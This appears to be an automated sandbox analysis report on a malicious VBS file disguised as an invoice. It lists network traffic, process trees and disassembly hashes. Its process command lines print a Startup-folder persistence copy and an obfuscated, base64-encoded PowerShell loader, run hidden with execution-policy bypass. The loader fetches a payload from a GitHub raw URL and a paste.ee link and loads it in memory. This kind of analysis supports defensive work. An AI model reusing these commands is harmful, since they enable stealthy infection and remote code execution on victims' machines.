                                                    2024-10-04 09:25:20 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                    Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.849709188.114.96.34434844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-04 09:25:23 UTC67OUTGET /d/DjfVC/0 HTTP/1.1
                                                    Host: paste.ee
                                                    Connection: Keep-Alive
                                                    2024-10-04 09:25:23 UTC616INHTTP/1.1 200 OK
                                                    Date: Fri, 04 Oct 2024 09:25:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Frame-Options: SAMEORIGIN
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHMJjbCJlP4B3AeEfBXFiQcGbKaGp9h%2Bzd2meQmMab%2BanM02ko1bg62WFCEgJyt%2BWCtC4iEDMsyY%2FHuJOEcZkWHHgvQnjmB2EMJmFEjIOSx00HqAco6HdUSOpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                    Server: cloudflare
                                                    CF-RAY: 8cd41fd7dc8e42c4-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-04 09:25:23 UTC753INData Raw: 31 31 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                    Data Ascii: 1133<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                    2024-10-04 09:25:23 UTC1369INData Raw: 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c
                                                    Data Ascii: ink rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded',
                                                    2024-10-04 09:25:23 UTC1369INData Raw: 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 39 56 65 75 37 54 41 77 39 33 76 7a 2e 72 61 59 73 66 46 61 55 45 4e 6e 5f 72 75 4f 71 75 31 54 55 41 73 62 36 57 6e 31 4d 4a 38 2d 31 37 32 38 30 33 33 39 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 64 2f 44 6a 66 56 43 2f 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66
                                                    Data Ascii: n="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="9Veu7TAw93vz.raYsfFaUENn_ruOqu1TUAsb6Wn1MJ8-1728033923-0.0.1.1-/d/DjfVC/0"> <a href="https://www.cloudf
                                                    2024-10-04 09:25:23 UTC920INData Raw: 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61
                                                    Data Ascii: -footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudfla
                                                    2024-10-04 09:25:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:05:25:06
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"
                                                    Imagebase:0x7ff7f6200000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:05:25:07
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
                                                    Imagebase:0x7ff655e20000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:05:25:07
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:05:25:07
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\PING.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:ping 127.0.0.1 -n 10
                                                    Imagebase:0x7ff6f3390000
                                                    File size:22'528 bytes
                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:05:25:16
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:05:25:18
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:05:25:18
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:05:25:18
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FFB4AB424ED Relevance: .5, Instructions: 456COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1612311427.00007FFB4AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ab40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0449981ebf3d033cce9715d2da1035225ef1a6a03925219679dddd47795e21
                                                      • Instruction ID: 5adfd09ce2949a8e7c2d7dae8250522e1348acbbd809023e026683edc049ad75
                                                      • Opcode Fuzzy Hash: 0f0449981ebf3d033cce9715d2da1035225ef1a6a03925219679dddd47795e21
                                                      • Instruction Fuzzy Hash: 75D158A690EAD90FE756AF7888651B5BFA8EF16310F2800FED48CCB593D9189C05C351
                                                      Function 00007FFB4AB42536 Relevance: .3, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1612311427.00007FFB4AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ab40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4a34f5c05bc72dcd2d782ef78cee2661066befe4b2b20c8869a479c79a03795
                                                      • Instruction ID: 2436b38a9e5c2f0ce4d53bf1e8b62ee2e65bd89a4bf021bb5fe12ed495445df2
                                                      • Opcode Fuzzy Hash: e4a34f5c05bc72dcd2d782ef78cee2661066befe4b2b20c8869a479c79a03795
                                                      • Instruction Fuzzy Hash: 9DA126E690EBD60FE7A6AF7889651757FA8EF16200B2900FED088CF5D3D9189C05D351
                                                      Function 00007FFB4AA74CE5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1612107245.00007FFB4AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4aa70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: d4376db75730dbad0f752dc864cba7150e6f0c711f67a3b2ea1f212e0d6c9e2c
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: 9301677121CB0C4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3651D736E882CB45

                                                      Non-executed Functions

                                                      Function 00007FFB4AB43292 Relevance: .5, Instructions: 549COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1612311427.00007FFB4AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ab40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 188bf201a87033fe6bed9af5c081d99d2df0b34543788a358914119c2e73db1c
                                                      • Instruction ID: 04fd8cfaaf0fea6c9395d6665b1471aadca05b193ed13cbfa7e7206d50d23876
                                                      • Opcode Fuzzy Hash: 188bf201a87033fe6bed9af5c081d99d2df0b34543788a358914119c2e73db1c
                                                      • Instruction Fuzzy Hash: 78E158B290DB990FE796AE3898555F53FD8EF96220B1801FBD48DC7593DD18AC06C381

                                                      Executed Functions

                                                      Function 00007FFB4AA737B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1770470740.00007FFB4AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4aa70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: 2f28837e46d38b445d00b4ca76bf422f0afb732483bb531a0c54da62b1187d1d
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: 5601677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3651D636E882CB45

                                                      Executed Functions

                                                      Function 00007FFB4AB631D2 Relevance: .6, Instructions: 560COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7970cf810fa82e90fae765d63b6f5339e1101686d7316702dd155c91c2c7a014
                                                      • Instruction ID: 8c8a31094aca58834b76b22676ad17aa26cfa521d2a739e6a1af279cd677b974
                                                      • Opcode Fuzzy Hash: 7970cf810fa82e90fae765d63b6f5339e1101686d7316702dd155c91c2c7a014
                                                      • Instruction Fuzzy Hash: 65F127A290EBCA4FE796AF7CC8551B5BFE4EF16610B1800FED44CCB493D9199806C352
                                                      Function 00007FFB4AB60060 Relevance: .7, Instructions: 681COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ee75d520352037e1881ae8678ce5a9e2f27c8baec1dfd4cea3910da3814c9e2
                                                      • Instruction ID: 288b01939f35b32a9bc65041f1690d7a19f24e3aebea27971a48b3cacf39651a
                                                      • Opcode Fuzzy Hash: 8ee75d520352037e1881ae8678ce5a9e2f27c8baec1dfd4cea3910da3814c9e2
                                                      • Instruction Fuzzy Hash: A52244A2A0DF8A0FE796AE7C88642B47BE5EF56610B1841FBD04DC75D3DD18AC05C382
                                                      Function 00007FFB4AB60644 Relevance: .5, Instructions: 466COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef5cbdbcaa6b5a863fd5bf2adf23db39fea78811fc1b1d32be6f8db8281a0666
                                                      • Instruction ID: 7b5c79a292cf60dea14aadbd79ac47bc777ade516afe4fd38c46b6d1d343cd59
                                                      • Opcode Fuzzy Hash: ef5cbdbcaa6b5a863fd5bf2adf23db39fea78811fc1b1d32be6f8db8281a0666
                                                      • Instruction Fuzzy Hash: 33E114B290DBCA4FE756EF3CC8152A47FE1EF46710F1841FAD089C7593DA29A8458782
                                                      Function 00007FFB4AB6853E Relevance: .2, Instructions: 227COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02792c7a252e836b0f55d04432b71158b4e318e1bcfcab2dd677aa6a90ff478e
                                                      • Instruction ID: 6c967c3acaf84acac05265b1b22898e8b7f4bed849d58bab5f623da91e54581b
                                                      • Opcode Fuzzy Hash: 02792c7a252e836b0f55d04432b71158b4e318e1bcfcab2dd677aa6a90ff478e
                                                      • Instruction Fuzzy Hash: FB615BA6A1EB860FF7A6AEBC892527566C1EF54A50F6800FEC58DC35D3DD08AC058343
                                                      Function 00007FFB4AB60691 Relevance: .2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d6d764f2ecae9169d2f60f152ef826f2b32710cef4a8137b4feb80c441e4e47
                                                      • Instruction ID: 700d11d9b277029ddb1222c074790c2e352769ed9f7d11417c4e3d4e0c3e4af8
                                                      • Opcode Fuzzy Hash: 4d6d764f2ecae9169d2f60f152ef826f2b32710cef4a8137b4feb80c441e4e47
                                                      • Instruction Fuzzy Hash: 6551D2B591CF8E4BFB94EE2DC9452B57BD5FF44700F6881F9E44883982DA25EC418AC2
                                                      Function 00007FFB4AB6038E Relevance: .2, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74d7218e69627bfaed76eaab73e9bdf41bd38fc2248869469c7e3c607be4dd6d
                                                      • Instruction ID: d8486645dc259199240b57297760f099d5468d50875f0a80128e257455208b0c
                                                      • Opcode Fuzzy Hash: 74d7218e69627bfaed76eaab73e9bdf41bd38fc2248869469c7e3c607be4dd6d
                                                      • Instruction Fuzzy Hash: 53512572A0DF8A0FF7A5AE7D85A92747BE0EF55210B5940FAD44CCB593E9289C048342
                                                      Function 00007FFB4AB6858A Relevance: .1, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1738992865.00007FFB4AB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ffb4ab60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b44225b1ad473cc0ebfa12324e512e658706e5bbed7ec239410ae60cdee088e7
                                                      • Instruction ID: 7aad33c29c9ec6681e97f3e383cbdc0c40b97826067fb07c83ed31594e1eac71
                                                      • Opcode Fuzzy Hash: b44225b1ad473cc0ebfa12324e512e658706e5bbed7ec239410ae60cdee088e7
                                                      • Instruction Fuzzy Hash: 684126E7E0FA870BF3A6AEBC8A6527455C5AF94A51F6800FAD58DC35D2DC1C9C054343
